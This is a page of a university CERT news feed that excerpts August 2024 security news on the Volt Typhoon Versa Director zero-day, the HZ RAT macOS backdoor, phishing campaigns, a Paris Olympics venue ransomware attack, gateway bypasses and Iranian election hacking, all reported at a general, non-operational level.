News – Page 2 – BU-CERT

Chinese Volt Typhoon hackers exploited Versa zero-day to breach ISPs, MSPs

Posted on 28 August 2024

From bleepingcomputer.com

The Chinese state-backed hacking group Volt Typhoon is behind attacks that exploited a zero-day flaw in Versa Director to upload a custom webshell to steal credentials and breach corporate networks.

Versa Director is a management platform ISPs and MSPs use to manage virtual WAN connections created using SD-WAN services.

The vulnerability is tracked as CVE-2024-39717 and resides in a feature allowing admins to upload custom icons to customize the Versa Director GUI. However, the flaw allowed threat actors with administrator privileges to upload malicious Java files disguised as PNG images, which can then be executed remotely.

In an advisory published yesterday, Versa says that Director versions 21.2.3, 22.1.2, and 22.1.3 are impacted by the flaw. Upgrading to the latest version, 22.1.4, will fix the vulnerability, and admins should review the vendor’s system hardening requirements and firewall guidelines.

Versa told BleepingComputer that they classify this vulnerability as a privilege elevation flaw as it was used to harvest credentials from users who logged into the system. However, other types of malware could have been used to perform different types of malicious activity on the device.

macOS Version of HZ RAT Backdoor Targets Chinese Messaging App Users

Posted on 28 August 2024

From thehackernews.com

Users of Chinese instant messaging apps like DingTalk and WeChat are the target of an Apple macOS version of a backdoor named HZ RAT.

The artifacts “almost exactly replicate the functionality of the Windows version of the backdoor and differ only in the payload, which is received in the form of shell scripts from the attackers’ server,” Kaspersky researcher Sergey Puzan said.

HZ RAT was first documented by German cybersecurity company DCSO in November 2022, with the malware distributed via self-extracting zip archives or malicious RTF documents presumably built using the Royal Road RTF weaponizer.

The attack chains involving RTF documents are engineered to deploy the Windows version of the malware that’s executed on the compromised host by exploiting a years-old Microsoft Office flaw in the Equation Editor (CVE-2017-11882).

New QR Code Phishing Campaign Exploits Microsoft Sway to Steal Credentials

Posted on 28 August 2024

From thehackernews.com

Cybersecurity researchers are calling attention to a new QR code phishing (aka quishing) campaign that leverages Microsoft Sway infrastructure to host fake pages, once again highlighting the abuse of legitimate cloud offerings for malicious purposes.

“By using legitimate cloud applications, attackers provide credibility to victims, helping them to trust the content it serves,” Netskope Threat Labs researcher Jan Michael Alcantara said.

“Additionally, a victim uses their Microsoft 365 account that they’re already logged-into when they open a Sway page, that can help persuade them about its legitimacy as well. Sway can also be shared through either a link (URL link or visual link) or embedded on a website using an iframe.”

The attacks have primarily singled out users in Asia and North America, with technology, manufacturing, and finance sectors being the most sought-after sectors.

Microsoft Sway is a cloud-based tool for creating newsletters, presentations, and documentation. It is part of the Microsoft 365 family of products since 2015.

Be careful what you pwish for – Phishing in PWA applications

Posted on 24 August 2024

From welivesecurity.com

ESET analysts dissect a novel phishing method tailored to Android and iOS users.

[They] discovered a series of phishing campaigns targeting mobile users that used three different URL delivery mechanisms. These mechanisms include automated voice calls, SMS messages, and social media malvertising.

The voice call delivery is done via an automated call that warns the user about an out-of-date banking app and asks the user to select an option on the numerical keyboard. After pressing the correct button, a phishing URL is sent via SMS. This was reported in a tweet, by Michal Bláha.

Initial delivery by SMS was performed by sending messages indiscriminately to Czech phone numbers. The message sent included a phishing link and text to socially engineer victims into visiting the link.

Paris Olympics deals with ransomware attack

Posted on 9 August 2024

From scmagazine.com

A ransomware attack against the Paris Grand Palais exhibition hall, where Olympic events are being held, is being investigated.

According to MSN, a police investigation determined that the attackers targeted the institution’s central computer system, but the incident had not caused any disruption to Olympic events.

The computer system at the venue also handles data for 40 — mainly small — museums with which it is affiliated, the prosecutors said in an email.

Josh Jacobson, director of professional services at HackerOne called the attack unsurprising — but potentially quite creative. He said the outcome of this successful compromise could be beneficial to cybercriminals in a number of ways:

1) Because of the sheer number of venues that will be scrambling to get their operations up and running, the bad actors could be hoping to rake in ransoms across the victim pool and maximise financial gain.

Secure Web Gateways are anything but as infosec hounds spot dozens of bypasses

Posted on 9 August 2024

From theregister.com

Defcon Secure Web Gateways (SWGs) are an essential part of enterprise security, which makes it shocking to learn that every single SWG in the Gartner Magic Quadrant for SASE and SSE can reportedly be bypassed, allowing attackers to deliver malware without Gateways ever catching on.

Using a tactic he’s dubbed “last mile reassembly,” SquareX founder and long-time security researcher Vivek Ramachandran said he’s managed to suss out more than 25 different methods to bypass SWGs, all of which boil down to the same basic exploit: They miss a lot of what’s going on in modern web browsers.

“[SWGs] were invented almost 15, 17 years back [and] it all started as SSL intercepting proxies,” Ramachandran told us. “As cloud security became more important people built out this entire security stack in the cloud.

“This is really where the problem begins.”

SWGs, Ramachandran explains, are mostly relying on their ability to infer application layer attacks from network traffic before they make it to a web browser. If, say, the traffic wasn’t recognizable as malicious, the SWG might not detect it, instead delivering it to a user’s browser.

Microsoft researchers report Iran hackers targeting US officials before election

Posted on 9 August 2024

From reuters.com

WASHINGTON, Aug 9 (Reuters) – Microsoft researchers said on Friday that Iran government-tied hackers tried breaking into the account of a “high ranking official” on the U.S. presidential campaign in June, weeks after breaching the account of a county-level U.S. official.

The breaches were part of Iranian groups’ increasing attempts to influence the U.S. presidential election in November, the researchers said in a report that did not provide any further detail on the “official” in question.

The report follows recent statements by senior U.S. Intelligence officials that they’d seen Iran ramp up use of clandestine social media accounts with the aim to use them to try to sow political discord in the United States.

Iran’s mission to the United Nations in New York told Reuters in a statement that its cyber capabilities were “defensive and proportionate to the threats it faces” and that it had no plans to launch cyber attacks. “The U.S. presidential election is an internal matter in which Iran does not interfere,” the mission added in response to the allegations in the Microsoft report.